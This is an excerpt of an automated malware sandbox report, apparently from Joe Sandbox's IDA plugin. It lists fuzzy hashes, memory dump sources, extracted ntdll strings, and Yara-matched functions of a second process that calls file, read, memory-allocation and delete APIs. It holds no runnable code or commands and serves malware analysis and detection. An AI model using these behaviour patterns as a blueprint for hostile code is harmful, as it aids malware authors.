                                                        • Instruction ID: 9f879698e741beffc1985621c2b9f69bcc0eae5ebba86fcf30d4598bacb81418
                                                        • Opcode Fuzzy Hash: f1faec2c004f71e258806d61a33b857f82de961c1ded0e368e1563234c18a0d7
                                                        • Instruction Fuzzy Hash: AB900435311500030105F5DC071CD0740CFD7D5351355C031F1055550CD771CD715331
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf245e7de749754f324ef5a468cbbf1d160f7ed0086f1420f846fc829255794a
                                                        • Instruction ID: 5d3cfd63825d29a2a17eda963cacb311558b490aeb66a5b046c00df25e6c8f26
                                                        • Opcode Fuzzy Hash: cf245e7de749754f324ef5a468cbbf1d160f7ed0086f1420f846fc829255794a
                                                        • Instruction Fuzzy Hash: D4900225221500030145B598061890B4489A7D6351395C015F1456590CC66189655321
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 750712b42488355b82a8a252b0298e3b7f9663bef799e8eed43bc7b36b476df2
                                                        • Instruction ID: de4d4466361f3570218a877fa647ed81d2fe4cd1ccc7a73f440590481194acd6
                                                        • Opcode Fuzzy Hash: 750712b42488355b82a8a252b0298e3b7f9663bef799e8eed43bc7b36b476df2
                                                        • Instruction Fuzzy Hash: 3D90023124150403D14171984418A06404DA7D0241F95C012E0464554EC6958B56AB61
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a622af7848d710f05e7b51143bea5e764660ebf880f8663fee009b95489083dd
                                                        • Instruction ID: e30f1b682735eca1995de4a8892289e47c966b8fb54090f41964f8f899594029
                                                        • Opcode Fuzzy Hash: a622af7848d710f05e7b51143bea5e764660ebf880f8663fee009b95489083dd
                                                        • Instruction Fuzzy Hash: 91900221242541535545B1984418907804AA7E0241795C012E1454950CC5669956D721
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a22a207fad7d06b2cc510a882732c8ca5ee8aa59057c0e5d228bdd244041fb0
                                                        • Instruction ID: 57625da564a3e5cdbec694783bf2ad3e4b5b0dd872396b2d46e135c069701ec9
                                                        • Opcode Fuzzy Hash: 6a22a207fad7d06b2cc510a882732c8ca5ee8aa59057c0e5d228bdd244041fb0
                                                        • Instruction Fuzzy Hash: D090022921350003D1807198541CA0A404997D1202F95D415E0055558CC95589695321
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 157a7523f3383c6acab06e937215ede3ad0c012309474300a3613328820b2d6a
                                                        • Instruction ID: 7f7c32f67cd54e82d1a3baee839ca6d91ce3888be84ab5b23776fc604d2736cf
                                                        • Opcode Fuzzy Hash: 157a7523f3383c6acab06e937215ede3ad0c012309474300a3613328820b2d6a
                                                        • Instruction Fuzzy Hash: 1590022120554443D1007598541CE06404997D0205F55D011E10A4595DC6758951A231
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d32eada8ae6476fc5972d3b2d160d9cb8e652fadeda4cea1878bcbf12a096bc
                                                        • Instruction ID: 23145cf4460aa933120a3d7c68d072b1e67acc5866e1e5cae944a06b7792bc8f
                                                        • Opcode Fuzzy Hash: 5d32eada8ae6476fc5972d3b2d160d9cb8e652fadeda4cea1878bcbf12a096bc
                                                        • Instruction Fuzzy Hash: CD90022130150003D1407198542CA068049E7E1301F55D011E0454554CD95589565322
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b492fa36f7ee2d3a3089e32590a09cd983f915cf0d6ec39ec04c893882783a3
                                                        • Instruction ID: fd79d2b31817076b8f1801bf1b94bf3b0d4e08e01937a4938dcff2ce66bcf190
                                                        • Opcode Fuzzy Hash: 6b492fa36f7ee2d3a3089e32590a09cd983f915cf0d6ec39ec04c893882783a3
                                                        • Instruction Fuzzy Hash: BB90023120150403D10075D8541CA46404997E0301F55D011E5064555EC6A589916231
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 789a9a583fac40c03b1c941ae0405060dfa5fdac943c421c3fbf32724a3eb0ab
                                                        • Instruction ID: 963d56d0993e60c85451e3f8ecc06364de3b15665d507028e9676d3525098207
                                                        • Opcode Fuzzy Hash: 789a9a583fac40c03b1c941ae0405060dfa5fdac943c421c3fbf32724a3eb0ab
                                                        • Instruction Fuzzy Hash: 5D90022160550403D1407198542CB06405997D0201F55D011E0064554DC6998B5567A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbc3b34a9c5cc3777ab4e9052a4d820b52a68ad71ec2133bd2d28d7615816bf2
                                                        • Instruction ID: 53ee1d4f5e34917e3f191aa69722dd6c64f9ad84192e283c41e04d130262c0b5
                                                        • Opcode Fuzzy Hash: dbc3b34a9c5cc3777ab4e9052a4d820b52a68ad71ec2133bd2d28d7615816bf2
                                                        • Instruction Fuzzy Hash: 1690023120150403D1007198551CB07404997D0201F55D411E0464558DD69689516221
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce8ab91edc85e02b64695e251bd23ca736da88dba112a5e2e0e133e47926aea1
                                                        • Instruction ID: b0c590d5f708e1e84eeb451628c7a6d0d3b716b1f3c41d4ef31f8c1dbc034b68
                                                        • Opcode Fuzzy Hash: ce8ab91edc85e02b64695e251bd23ca736da88dba112a5e2e0e133e47926aea1
                                                        • Instruction Fuzzy Hash: FF90023120150843D10071984418F46404997E0301F55C016E0164654DC655C9517621
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aed709cd8b1ebd3fc81d45a5716132d0c8ec0d877d0f8bf8b93b84ecb489938b
                                                        • Instruction ID: 8d85db998290d75d32c4a9454d6a15c0f23ad6c15562dd7e47e79c4dec944189
                                                        • Opcode Fuzzy Hash: aed709cd8b1ebd3fc81d45a5716132d0c8ec0d877d0f8bf8b93b84ecb489938b
                                                        • Instruction Fuzzy Hash: 5D90023120190403D10071984828B0B404997D0302F55C011E11A4555DC66589516671
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1cd998b507c271f09d2027df7412f0b77f0602745038f2010eb32196091699d5
                                                        • Instruction ID: 03853f3bb1286c63ba3c803fa4631565a53f619202bb78973fcb2aef7d5d263a
                                                        • Opcode Fuzzy Hash: 1cd998b507c271f09d2027df7412f0b77f0602745038f2010eb32196091699d5
                                                        • Instruction Fuzzy Hash: 1290022160150043414071A88858D068049BBE1211755C121E09D8550DC59989655765
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d284b9bd97415e8af715f3e4798943c9188566b624b51d027c231ccebfe3074e
                                                        • Instruction ID: 5d5efe4f46c6daca628148bbb95b88fc2854086b3d5f0a6772c38b79b369fa8f
                                                        • Opcode Fuzzy Hash: d284b9bd97415e8af715f3e4798943c9188566b624b51d027c231ccebfe3074e
                                                        • Instruction Fuzzy Hash: 0690023120190403D1007198481CB47404997D0302F55C011E51A4555EC6A5C9916631
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 1c97044f21a011c13c6be97b52dfc17a48ab782382350661788bc6cfda861e67
                                                        • Instruction ID: 56f9d21edea3c034d7857505a402431d555b4c39c5bfb369770415a6f3db7a22
                                                        • Opcode Fuzzy Hash: 1c97044f21a011c13c6be97b52dfc17a48ab782382350661788bc6cfda861e67
                                                        • Instruction Fuzzy Hash: 8351D4B2A00216BFCB15DF9C899097EFBFCBB882417148269E56DD7641D334DE408BA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: fb36b6e68237278db460062e46a7959eff1fc1049c41c98b39d49074be44c105
                                                        • Instruction ID: d29b82d9b6a9b4c7043b95ceeeec30bc09cfbc0b048f25c865f2fbd60acf338b
                                                        • Opcode Fuzzy Hash: fb36b6e68237278db460062e46a7959eff1fc1049c41c98b39d49074be44c105
                                                        • Instruction Fuzzy Hash: 74512771A04656AFCB30DF5DC8909BFBBFDFB44201B848869E5DEC7641E674EA0487A0
                                                        Strings
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019646FC
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01964787
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01964725
                                                        • ExecuteOptions, xrefs: 019646A0
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01964742
                                                        • Execute=1, xrefs: 01964713
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01964655
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: c7ac772e5dd9f812f91ef4b64018679d238850cce410158fd789332767751396
                                                        • Instruction ID: 2cfe256f594df625df18b40ee5a0574636d0c9c2e05e3e7292d5ce6db4c3278a
                                                        • Opcode Fuzzy Hash: c7ac772e5dd9f812f91ef4b64018679d238850cce410158fd789332767751396
                                                        • Instruction Fuzzy Hash: 36512A3160022A6AEF25EBE8DC89FA977ACAF64305F040499D60DF7181D7719E45CF51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                        • Instruction ID: 971d80ac793af185925caa1c15364dbf6792b329aedd1b7cc9a3b685bdf37849
                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                        • Instruction Fuzzy Hash: 70020671508342AFD305CF68C890A6BBBE5EFD8B14F04892DFA894B364DB31E945CB52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction ID: d2ec2b64b8fe01b76de70f8929ba14f97eec7ae8d95965f60fb2ee2d0eb3ed43
                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction Fuzzy Hash: E981E470E052499EEF26CE6CC8517FEBBB5EFC4321F18451AD85BA7692C7308840C752
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: 297a75b3456ebf1c2d8ba8b024db4ab6aac417ea5535996cbae4627576153fa9
                                                        • Instruction ID: 2ebadefb15d388b45d79e327e9083d3707e89077c780d105b8b9f1b695743458
                                                        • Opcode Fuzzy Hash: 297a75b3456ebf1c2d8ba8b024db4ab6aac417ea5535996cbae4627576153fa9
                                                        • Instruction Fuzzy Hash: CF21337AE00119ABDB11DF69DC44EEE7BEDAF94654F450126EA09D3200E734EA058BE1
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 0196031E
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019602BD
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019602E7
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: 71aa963d6cdba08394712580502999e368ed135e3d76e471129f0e72e7a85391
                                                        • Instruction ID: 1baccf0e6f5caea1bf3414f4afa827e0d2d7604795d7e6cfee3af352a514d73e
                                                        • Opcode Fuzzy Hash: 71aa963d6cdba08394712580502999e368ed135e3d76e471129f0e72e7a85391
                                                        • Instruction Fuzzy Hash: C9E1AF706087499FD725CF28C884B2ABBE8BF84314F180A5DF5A9CB2D1D774D989CB52
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01967BAC
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01967B7F
                                                        • RTL: Resource at %p, xrefs: 01967B8E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 0ca9f043323f8c9a163d801c1b5e3cfc0d96b277e075f31c1123fe89ee09f437
                                                        • Instruction ID: ef1f4235b5aa683c2c172cff1c3614842c88d5cdce6a0006619b573c2564da85
                                                        • Opcode Fuzzy Hash: 0ca9f043323f8c9a163d801c1b5e3cfc0d96b277e075f31c1123fe89ee09f437
                                                        • Instruction Fuzzy Hash: BB41D2317047029FD725DE29C840F6AB7E9EF98721F100A1DEA5EEB680DB71E9058B91
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0196728C
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 019672C1
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01967294
                                                        • RTL: Resource at %p, xrefs: 019672A3
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: a0f13d3d0ef82c2d56078f8d25529e08cff05a1334cbfb5a7b992957cd5ea211
                                                        • Instruction ID: 5df55b61bedb01a42420b29945cd4ead678c3c21e1d7f40e9090075670ed2407
                                                        • Opcode Fuzzy Hash: a0f13d3d0ef82c2d56078f8d25529e08cff05a1334cbfb5a7b992957cd5ea211
                                                        • Instruction Fuzzy Hash: 7041C131700216ABD725DE69CC81F66B7E9FF94715F100A19F959EB240DB21F8428BE1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: d8fd9a7680dc8fc6d07ba1fe1da58c88cb1d8794f5c490d46d0830c98930e248
                                                        • Instruction ID: fd2af9b9e56762587161c2920c6a8b6c863220da6b740d61e1fa6ed4b09e0d66
                                                        • Opcode Fuzzy Hash: d8fd9a7680dc8fc6d07ba1fe1da58c88cb1d8794f5c490d46d0830c98930e248
                                                        • Instruction Fuzzy Hash: 58315472A002299FDB20DF29DC40BEE77FCEF55611F844555E94DE7240EF309A488BA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction ID: 28392ffccbc599d78b83cd88e57c230de1b6047940d925aa69245b12e023ad09
                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                        • Instruction Fuzzy Hash: BF9178B1E002169BDB28DF9DC881ABEBBA9FFC4721F14461AE95DE72D0D73099408761
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: ef8af53c856a4cc207efaf20b7c7c13acc8e9b8f67972d14fbaff48e4828f018
                                                        • Instruction ID: c5028a9f2496064fde01f9513adadee762b367000d1e97e88bee750f6d2e10af
                                                        • Opcode Fuzzy Hash: ef8af53c856a4cc207efaf20b7c7c13acc8e9b8f67972d14fbaff48e4828f018
                                                        • Instruction Fuzzy Hash: 4D810971D01269DBDB35CB54CC44BEABBB8AB48714F0041EAEA1DB7280D7709E85CFA0

                                                        Execution Graph

                                                        Execution Coverage:2.5%
                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                        Signature Coverage:1.6%
                                                        Total number of Nodes:446
                                                        Total number of Limit Nodes:72

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$9$$"$$$($-:$1P$1\$2$2u$3W$9$9$$9,$=J$>$B"$E$F$G+$HD$Z$\:$\^$_$cg$e[W;$f$h\$m=$p1$uS$w$x*$y$yz$}m
                                                        • API String ID: 0-366951236
                                                        • Opcode ID: fcb4f3d28b924e1c4e9f439457e990674b2ff287ef2744238c54314375137829
                                                        • Instruction ID: e8711dae2fb5d0d704dd0f30baceea0c389a83c0cc9706b19c19445b82483a1b
                                                        • Opcode Fuzzy Hash: fcb4f3d28b924e1c4e9f439457e990674b2ff287ef2744238c54314375137829
                                                        • Instruction Fuzzy Hash: BD52AEB0D06628CBEF25CF48C9987DDBBB1BB44309F1081DAD409AB291C7B96E85DF45
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 003AC044
                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 003AC07F
                                                        • FindClose.KERNELBASE(?), ref: 003AC08A
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: 24464816e17da397133f8faeb9bff9d2a6b8fc60da996649612782ece46a2aa2
                                                        • Instruction ID: 60cf5e7949b21618c29b89dfccfac34389832e632ba5c4a98c4edd225be4c757
                                                        • Opcode Fuzzy Hash: 24464816e17da397133f8faeb9bff9d2a6b8fc60da996649612782ece46a2aa2
                                                        • Instruction Fuzzy Hash: DD31A771900349BBEB21DF60CC85FFF77BCEF55744F144559BA08AB181DA70AA848BA0
                                                        APIs
                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 003B7F66
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 8d28ed5a82766e8a88ecc84e479eca568abbf297ed05f10f815e9ef91fae3f37
                                                        • Instruction ID: 857f13d7260df54cf6475a347fc544618187295c57bc70698c0e34646d1724fb
                                                        • Opcode Fuzzy Hash: 8d28ed5a82766e8a88ecc84e479eca568abbf297ed05f10f815e9ef91fae3f37
                                                        • Instruction Fuzzy Hash: B531C6B5A01609AFCB14DF99D881EEFB7F9EF8C314F108219F919A7240D770A811CBA5
                                                        APIs
                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 003B80AB
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 42abda00a236972264b0f29d2bfd90fb591ae2773a949e304055543eef79dc66
                                                        • Instruction ID: 426c4585c738693a42638570abfffde7abe5c5ff26cb903adad863c075b278b0
                                                        • Opcode Fuzzy Hash: 42abda00a236972264b0f29d2bfd90fb591ae2773a949e304055543eef79dc66
                                                        • Instruction Fuzzy Hash: C0310BB5A00609AFDB14DF99D881EEFB7B9EF8C314F104219FE19A7241D770A811CBA1
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(003A1AAE,?,?,00000000,00000004,00003000,?,?,?,?,?,?,003A1AAE,003B9FD1,?,00004448), ref: 003B836D
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: 1849f4d48a2eb12130bf378be031498f75d2e4a919294946eae0b6b7fcea62f7
                                                        • Instruction ID: 25eb300e1ba16953dc580ed83c794ded3e2ce338e01560cf91f05e1357823921
                                                        • Opcode Fuzzy Hash: 1849f4d48a2eb12130bf378be031498f75d2e4a919294946eae0b6b7fcea62f7
                                                        • Instruction Fuzzy Hash: FB212BB5A00649ABDB10DF99CC41FEF77A9EF88314F004209FE099B241D770A911CBA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 0bceb573df5401a9c667bfc0a2f8a9442a426de7377309d08418d9d12b721291
                                                        • Instruction ID: dd750835cd131b3d70523ab3b8b8be8f2eaf844a920fc6bc7f23f5f6609abeef
                                                        • Opcode Fuzzy Hash: 0bceb573df5401a9c667bfc0a2f8a9442a426de7377309d08418d9d12b721291
